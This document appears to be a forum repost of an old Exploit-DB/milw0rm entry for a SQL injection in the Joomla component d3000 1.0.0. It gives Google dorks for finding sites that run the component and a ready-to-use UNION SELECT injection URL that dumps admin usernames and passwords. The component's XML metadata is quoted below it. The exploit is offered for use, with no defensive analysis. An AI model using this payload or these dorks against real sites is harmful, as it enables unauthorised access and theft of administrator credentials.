Exploit Joomla! Component d3000 1.0.0 - SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5299
Проверка EDB
  1. Пройдено
Автор
S@BUN
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2008-03-23
Код:
##########################################
#
# Powered by Download 3000
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####BLOG : http://my.opera.com/SQL-Injection/blog/
#
####MAiL : [email protected]
#
###########################################
#
# DORK 1 : "Powered by Download 3000"
#
# DORK 2 : allinurl: "com_d3000"
#
###########################################
EXPLOiT :

index.php?option=com_d3000&task=showarticles&id=-99999/**/union/**/select/**/0,username,pass_word/**/from/**/admin/*


###########################################
------------------S@BUN-------------------#
###########################################
[email protected]#
###########################################
--http://my.opera.com/SQL-Injection/blog/-#
###########################################

side note:
    <name>D3000</name>
    <author>Csaba Kissi</author>
    <creationDate>April 2006</creationDate>
    <copyright>(C) 2006 Open Source Matters. All rights reserved.</copyright>
    <license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license>

    <authorEmail>[email protected]</authorEmail>
    <authorUrl>joomla.download3000.com</authorUrl>
    <version>1.0.0</version>
    <description><![CDATA[
     This component integrates the whole www.Download3000.com software archive (more than 12.000 software articles already)<br /> 
     to your Joomla powered site within one minute. The best of all is the fact that you can earn money through the<br /> 
     RegNow affiliate program. The component is optimized for Googlebot and Inktomi slurp so you'll get more visitors from search engines.<br />
     For more information about usage and your affiliate ID activation please read the help file in the package.<br />
     Please send us your suggestions, comments and future requests for the Download3000 component. Thank you in advance.]]> 
    </description>    

# milw0rm.com [2008-03-23]
 
Источник
www.exploit-db.com

Похожие темы